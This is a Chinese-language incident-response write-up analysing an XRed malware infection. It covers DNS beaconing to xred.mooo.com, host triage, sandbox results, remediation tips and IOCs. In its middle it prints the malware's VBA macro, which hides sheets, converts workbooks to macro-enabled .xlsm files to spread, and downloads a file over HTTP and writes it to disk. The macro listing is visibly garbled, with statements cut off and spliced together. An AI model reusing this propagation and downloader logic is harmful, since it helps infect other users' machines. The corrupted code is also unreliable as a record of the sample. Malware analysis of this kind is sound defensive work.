行业新闻

记一次XRed病毒攻击应急分析

记一次XRed病毒攻击应急分析

0x00序言

在日常工作中,如果办公电脑或者个人PC有以下两个方面的异常行为,则大概率已经中招XRed病毒,它属于AutoRun家族。具体情况如下:

1.打开xlsx电子表格文件,会提示宏并且文件内容也会改变,最关键的一个特点是关闭电子表格文件会进行后缀名的改变。(xlsx--xlsm

2. 在DNS请求流量中会有该恶意域名(xred.mooo.com)解析请求记录,周期为每10分钟一次。

0x01事件起因

发现DNS异常解析行为,定位终端进行问题排查。

1647134063_622d456fd551df73b5f69.png

0x02应急排查

定位到具体的终端,发现是一台windows10虚拟机,进行了网络及进程、注册表、启动项等相关排查,除了有DNS的异常解析行为(每10分钟一次)再无其他的影响。具体排查如下:

1.通过进程的异常分析,发现该病毒伪装成“Synaptics触摸板驱动程序”。

1647134150_622d45c69e08a4def1f75.png

2.对父进程进行追踪查找并进行kill,从而提取到该病毒样本。(在提取过程中注意打开显示隐藏文件)

3.然后使用火绒进行全面查杀,并无发现风险。

1647134205_622d45fd808cee868a5e9.png

0x03样本分析

提取病毒样本,进行下一步分析。具体流程如下:

  1. 使用IDA工具查文件的基础信息

MD5: FBA313D7C15B420EE31C263E79EA90A7

1647134402_622d46c22046803ad1ebf.png

使用Strings查看程序包含的字符信息

1647134413_622d46cd0d87c879e073c.png获取这些基础信息,通过奇安信、360、微步在线云沙箱自动化分析。

奇安信沙箱

1647134435_622d46e30d40c6b6ab846.png

360沙箱

1647134446_622d46eebe8452b7d0e2b.png

微步沙箱

1647134459_622d46fb5cd4ff7c53d87.png

  1. 样本运行详细过程

主机行为

1647134468_622d4704d4e93ffbab546.png

进程行为

1647134479_622d470fe18146e0d782e.png

网络行为

1647134487_622d4717cd12fb96f25a4.png

1647134497_622d47217279d1527d4eb.png

  1. 通过对样本的自动化分析,已经获取了很多关键信息,获取宏代码如下
Dim SheetsChanged As Boolean
Dim SheetCount As Integer

Private Sub Workbook_Open()
  Dim i As Integer
  For i = 1 To ActiveWorkbook.Sheets.Count
    ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
  Next i
  
  RegKeySave "HKCU\Software\Microsoft\Office\" > SheetCount Then
    SheetsChanged = True
    SheetCount = ActiveWorkbook.Sheets.Count
  End If
End Sub

Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
  Dim i As Integer
  Dim AIndex As Integer
  Dim FName

  AIndex = ActiveWorkbook.ActiveSheet.Index

  If SaveAsUI = False Then
    Cancel = True
    Application.EnableEvents = False
    Application.ScreenUpdating = False
    
    For i = 1 To ActiveWorkbook.Sheets.Count - 1
      ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
    Next i
    ActiveWorkbook.Save
      
    For i = 1 To ActiveWorkbook.Sheets.Count
      ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
    Next i
    ActiveWorkbook.Sheets(AIndex).Select
    SheetsChanged = False
    
    Application.ScreenUpdating = True
    Application.EnableEvents = True
  Else
    Cancel = True
    Application.EnableEvents = False
    Application.ScreenUpdating = False
    
    For i = 1 To ActiveWorkbook.Sheets.Count - 1
      ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
    Next i
    
    FName = Application.GetSaveAsFilename(fileFilter:="Excel Çalışma Kitabı (*.xlsm), *.xlsm")
    If FName > False Then
      ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled
      SaveAsInj ActiveWorkbook.Path
    End If
    
    For i = 1 To ActiveWorkbook.Sheets.Count
      ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
    Next i
    ActiveWorkbook.Sheets(AIndex).Select
    SheetsChanged = False
        
    Application.ScreenUpdating = True
    Application.EnableEvents = True
  End If
End Sub

Sub SaveAsInj(DIR As String)
  Dim FSO As Object
  Dim FN As String
  
  Set FSO = CreateObject("scripting.filesystemobject")
  FN = Environ("ALLUSERSPROFILE")  MSIE 7.0; Windows NT 6.0)"
  WinHttpReq.Option(6) = AllowRedirects
  WinHttpReq.Open "GET", MYU, False
  WinHttpReq.Send
  
  If (WinHttpReq.Status = 200) Then
    If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
      FDW = True
      Set oStream = CreateObject("ADODB.Stream")
      oStream.Open
      oStream.Type = 1
      oStream.Write WinHttpReq.ResponseBody
      oStream.SaveToFile (NMA)
      oStream.Close
    Else
       FDW = False
    End If
  Else
    FDW = False
  End If
End Function

0x04病毒归类

通过全流量留存或者进行数据包捕获,然后使用弥天实验室开发的dga恶意域名检测工具进行家族归类和受害主机定位。

这里使用的是沙箱运行留存的数据包,具体使用效果如下:

(工具使用和下载请参见HVV之基于360数据的dga恶意域名检测工具:

https://mp.weixin.qq.com/s/EPiQY_8i4LWP_S3aaX2yYw)

1647134604_622d478c51a30837376df.png

0x05修复建议

安装杀毒软件,定期升级病毒库

不要点击来源不明的邮件以及附件和链接

打全系统及应用程序补丁并及时更新

采用高强度的密码,避免使用弱口令密码,并定期更换密码(终端基线)

尽量关闭不必要的文件共享

提升安全意识

0x06参考链接

https://www.freebuf.com/articles/endpoint/222991.html

https://s.tencent.com/research/report/880.html

IOCs:

md5
13358cfb6040fd4b2dba262f209464de
FBA313D7C15B420EE31C263E79EA90A7

C2

xredline3@gmail.com

关闭